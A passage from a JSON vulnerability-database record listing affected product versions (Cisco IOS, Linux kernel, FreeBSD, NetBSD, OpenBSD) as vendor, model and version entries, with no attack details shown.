            "vendor": "cisco",
            "version": "12.4md"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.27"
          },
          {
            "_id": null,
            "model": "bsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsd",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yb5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yg"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.5.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)yy"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18.2\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.61"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(31\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0wx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)t12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yf3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2bz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ey2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ja"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(27\\)s1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "3.99.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7\\)da3"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "1.1.5.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.64"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5.4\\)wc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(6e\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11.5\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(30\\)s1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "1.2.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zd"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.27"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10\\)w5\\(18g\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.24"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)t9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.21"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(27\\)sv"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)ec1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sh"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.37"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2jk"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(19a\\)gs6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.30"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)db1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.10"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.35"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.17"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(19\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2cy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1.1\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(13a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)dc2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4sw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8\\)ea1b"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.27"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)dc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3ha"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)t11"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)st1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3\\(3.4\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)mb12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)xy5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.31"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(17\\)bt"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.26"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(19\\)gs0.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)fx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yu"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.21"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19.3\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1ia"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)db1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xd1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)st6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)t1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(27\\)sv2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(22\\)s5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xd3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)ewa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3\\(4.2\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(6d\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(16.5\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xa1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(11\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ea1a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(22\\)sv1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)ea6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yd"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yo"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11b\\)e12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)ea1c"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(7a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.28"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.7"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.21"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.45"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(14\\)gs2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ec2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xj"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)s6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(9a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zl1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.24"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.26"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)t2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)st2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zd4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.44"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.34"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.49"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zi"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.11"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.44"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sx1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9a\\)bc6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xg1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.30"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xs2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11\\)e"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.27"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xk4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)s3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7a\\)ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zj"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.37"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yl"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.50"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ea1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zo"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1t"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.39"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7\\)da2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)xe1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(11c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.9"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(4\\)mr"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "9.14"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.34"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.7"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xn"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.23"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3bc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xb15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(26\\)eb1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
